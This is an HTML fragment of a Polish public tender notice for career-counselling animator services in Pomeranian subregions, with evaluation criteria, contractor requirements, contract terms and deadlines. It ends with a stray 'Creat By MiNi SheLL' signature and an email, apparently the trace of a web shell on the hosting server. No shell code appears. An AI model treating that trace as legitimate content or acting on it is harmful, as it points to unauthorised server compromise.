spotkań doradców zawodowych w subregionie nadwiślańskim z udziałem ekspertów oraz pracodawców i<br/>innych środowisk w celu podnoszenia jakości i adaptacyjności świadczonych przez nich usług zgodnie z harmonogramem<br/>Projektu. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 210000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85312320-8 - Usługi doradztwa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</p> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <p class="mb-0">80400000-8 - Usługi edukacji osób dorosłych oraz inne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone. Oferty będą oceniane metodą punktową w skali 100-punktowej, przy czym 1 % = 1 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie w realizacji projektów w zakresie rozwoju zawodowego i/lub aktywizacji zawodowej osoby wskazanej przez Wykonawcę (P)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Animacja/koordynacja działań w obszarze budowania relacji społeczności/grup (A)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Próba wiedzy osoby wskazanej przez Wykonawcę do realizacji przedmiotu zamówienia w obszarze doradztwa zawodowego (W)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III przedmiotu zamówienia - Świadczenie usług Animatora doradztwa zawodowego w subregionach słupskochojnickim<br/>województwa pomorskiego obejmującym powiaty: bytowski, chojnicki, człuchowski, kościerski, lęborski, słupski i<br/>m. Słupsk oraz prace nad produktami tworzonymi w Projekcie.<br/>Przedmiot zamówienia dla części III obejmuje następujące działania:<br/>a) Narzędzie dla mieszkańców Pomorza:<br/>- Udział w pracach warsztatowej Grupy interdyscyplinarnej ds. opracowania Narzędzia dla mieszkańców Pomorza - min. 4<br/>spotkaniach w trakcie trwania Projektu, w tym:<br/>• min.3 spotkania w celu wypracowania wkładu merytorycznego do Narzędzia,<br/>• min.1 spotkanie obejmujące testowanie prototypu Narzędzia.<br/>- Testowanie wstępnej wersji Narzędzia dla mieszkańców Pomorza (min. 20 osób).<br/>- Prezentacja doradcom zawodowym subregionu słupsko-chojnickiego:<br/>• Scenariusza zajęć dla doradców zawodowych z obszaru Kompetencji przyszłości,<br/>• Scenariusza zajęć dla doradców zawodowych z obszaru Branż rozwojowych.<br/>b) Narzędzie dla pracodawców:<br/>Rekrutacja 5 pracodawców wg ustalonych kryteriów i przekazanie kontaktów Animatorowi metropolitalnemu północnemu,<br/>który przetestuje wśród nich Narzędzie cyfrowe stworzone przez wyłonioną firmę.<br/>- Upowszechnianie Narzędzia podczas spotkań informacyjno-edukacyjnych i wydarzeń dla pracodawców - min. 4 spotkania.<br/>c) Mapa:<br/>- Opracowanie założeń funkcjonowania Mapy (zawartość, forma itd.).<br/>- Określenie we współpracy z doradcami PSPZ oraz Animatorami źródeł informacji i sposobu ich pozyskiwania do Mapy.<br/>- Przygotowanie podstawowej wersji Mapy zgodnie z opracowanymi założeniami.<br/>- Nawiązanie kontaktu i współpraca z podmiotami działającymi w subregionie słupsko-chojnickim<br/>w obszarze poradnictwa zawodowego/uczenia się przez całe życie oraz zaangażowanie ich do przekazywania informacji do<br/>Mapy.<br/>- Pozyskiwanie informacji do Mapy od pozostałych Animatorów z ich subregionów oraz aktualizacja<br/>i ujednolicanie zasobów Mapy.<br/>- Opracowanie założeń upowszechniania zasobów Mapy wśród mieszkańców Pomorza.<br/>- Zaprezentowanie Hubu wiedzy na wydarzeniach, tj. targach, dniach kariery, konferencjach i in. w każdym subregionie woj.<br/>pomorskiego.<br/>d) Hub wiedzy:<br/>- Przygotowywanie i przekazywanie Zespołowi projektowemu oraz Animatorowi subregionu nadwiślańskiego wiedzy o<br/>pracodawcach z Branż rozwojowych z subregionu słupsko-chojnickiego.<br/>e) Działalność Pomorskiego Systemu Poradnictwa Zawodowego:<br/>- Rozwijanie sieci PSPZ, tj. rekrutacja nowych członków, w tym doradców zawodowych, doradców kariery, specjalistów ds.<br/>HR, przedsiębiorczości, szkoleń i coachingu.<br/>- Nawiązywanie i utrzymywanie kontaktów z pracodawcami w celu pozyskiwania wiedzy o potrzebach kompetencyjnych<br/>przedsiębiorstw z Branż rozwojowych.<br/>- Bieżąca współpraca z Zespołem projektowym, w tym udział w kwartalnych spotkaniach Zespołu<br/>w siedzibie Zamawiającego i w spotkaniach online według potrzeb.<br/>- Organizacja spotkań doradców zawodowych w subregionie słupsko-chojnickim z udziałem ekspertów oraz pracodawców i<br/>innych środowisk w celu podnoszenia jakości i adaptacyjności świadczonych przez nich usług. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 192000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85312320-8 - Usługi doradztwa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</p> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <p class="mb-0">80400000-8 - Usługi edukacji osób dorosłych oraz inne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone. Oferty będą oceniane metodą punktową w skali 100-punktowej, przy czym 1 % = 1 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie w realizacji projektów w zakresie rozwoju zawodowego i/lub aktywizacji zawodowej osoby wskazanej przez Wykonawcę (P)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Animacja/koordynacja działań w obszarze budowania relacji społeczności/grup (A)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Próba wiedzy osoby wskazanej przez Wykonawcę do realizacji przedmiotu zamówienia w obszarze doradztwa zawodowego (W)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie przedmiotowego zamówienia dla części I lub części II lub części III mogą się ubiegać wykonawcy, którzy spełniają warunki udziału w postępowaniu określone przez Zamawiającego.<br/>2. Zamawiający wymaga spełnienia warunku udziału w postępowaniu, w zakresie zdolności technicznej lub zawodowej.<br/>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, że skieruje do realizacji niniejszego zamówienia<br/>osobę zdolną do wykonania zamówienia, która posiada:<br/>1) Wykształcenie wyższe w zakresie doradztwa zawodowego i co najmniej roczne doświadczenie w wykonywaniu zadań z<br/>zakresu doradztwa zawodowego,<br/>lub<br/>Wykształcenie wyższe i studia podyplomowe w zakresie doradztwa zawodowego/ zawodoznawstwa/szkolnego doradcy<br/>zawodowego i co najmniej roczne doświadczenie w wykonywaniu zadań z zakresu doradztwa zawodowego,<br/>lub<br/>Wykształcenie wyższe i co najmniej dwuletnie doświadczenie w wykonywaniu zadań z zakresu doradztwa zawodowego.<br/>Jako wykonywanie zadań z zakresu doradztwa zawodowego należy rozumieć udzielanie porad z zakresu planowania kariery<br/>zawodowej i aktywizacji zawodowej w ramach umowy o pracę lub umowy cywilnoprawnej.<br/>2) Doświadczenie w realizacji minimum dwóch projektów w zakresie rozwoju zawodowego i/lub aktywizacji zawodowej,<br/>zrealizowanych w okresie ostatnich 10 lat przed upływem terminu składania ofert.<br/>Jako projekt w zakresie rozwoju zawodowego i/lub aktywizacji zawodowej Zamawiający rozumie działania realizowane<br/>bezpośrednio lub pośrednio na rzecz określonych odbiorców prowadzące do osiągnięcia założonego celu związanego z<br/>rozwojem zawodowym i/lub aktywizacją zawodową.<br/>Ocena wykazania spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów, o których<br/>mowa w rozdz. X pkt 1 ppkt 1) SWZ (wzór wykazu stanowi Załącznik nr 7 do SWZ).<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna), ww. warunek<br/>udziału, musi spełniać w całości przynajmniej jeden z Wykonawców. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Nie dotyczy - Wykonawca dołącza do oferty oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, którego wzór stanowi załącznik nr 6 do SWZ<br/>(oświadczenie wstępne). Oświadczenie stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału<br/>w postępowaniu na dzień składania ofert.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający żąda podmiotowych środków dowodowych na potwierdzenie spełnienia warunków udziału w postępowaniu dla części I<br/>lub części II lub części III przedmiotu zamówienia, tym samym:<br/>1) Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta<br/>została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień<br/>złożenia, następujących podmiotowych środków dowodowych:<br/>a) na potwierdzenie spełnienia warunku udziału w postępowaniu określonego w rozdz. VIII pkt 2) SWZ - wykaz osoby wskazanej<br/>przez Wykonawcę do realizacji przedmiotu zamówienia, która będzie uczestniczyć w wykonaniu zamówienia, odpowiedzialnej za<br/>świadczenie usługi, wraz z informacjami na temat jej doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, a także<br/>informacji o podstawie do dysponowania tą osobą. Wykaz ten należy sporządzić wg Załącznika nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia wykonawcy zobowiązani są do ustanowienia<br/>pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w<br/>postępowaniu o udzielenie zamówienia tych wykonawców albo do reprezentowania w postępowaniu i<br/>zawarciu umowy w sprawie zamówienia publicznego należy załączyć do oferty.<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia każdy spośród wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia składa oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków<br/>udziału w postępowaniu, którego wzór stanowi załącznik nr 6. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Część I, II, III przedmiotu zamówienia:<br/>1. Strony dopuszczają możliwość wprowadzenia zmian umowy w zakresie zmiany osoby skierowanej do realizacji przedmiotu Umowy, po uzyskaniu pisemnej zgody Zamawiającego.<br/>Zmiana może być dokonana po wcześniejszym przedstawieniu Zamawiającemu pisemnej informacji o zmianie wraz ze<br/>wskazaniem kwalifikacji i doświadczenia zawodowego nowej osoby, które nie mogą być niższe niż kwalifikacje i doświadczenie osoby zaakceptowanej przez Zamawiającego zgodnie z przedstawioną ofertą. Ponadto, nowa osoba musi<br/>otrzymać za prezentację i rozmowę kwalifikacyjną punktację na poziomie co najmniej wyniku uzyskanego przez Wykonawcę.<br/>2. Strony dopuszczają możliwość wprowadzenia zmian Umowy w zakresie zmiany Harmonogramu realizacji przedmiotu zamówienia, zawartego w Opisie Przedmiotu Zamówienia, zaakceptowanego przez Zamawiającego zgodnie z przedstawioną ofertą. Zmiana może być dokonana po wcześniejszym przedstawieniu Zamawiającemu przez Wykonawcę<br/>(lub Wykonawcy przez Zamawiającego) pisemnej informacji o proponowanej zmianie wraz z wyjaśnieniem, a następnie uzyskaniu pisemnej zgody Zamawiającego (lub Wykonawcy). Zmiana Harmonogramu realizacji przedmiotu zamówienia nie może spowodować ryzyka niewykonania lub nienależytego wykonania Umowy, w tym innych działań.<br/>3. Zmiany umowy mogą nastąpić również w przypadku wystąpienia siły wyższej, przez którą rozumie się zdarzenia, których<br/>pomimo zachowania należytej staranności spełniają łącznie trzy przesłanki: mają charakter zewnętrzny, są niemożliwe do przewidzenia i są niemożliwe do zapobieżenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-16 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-06-14</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com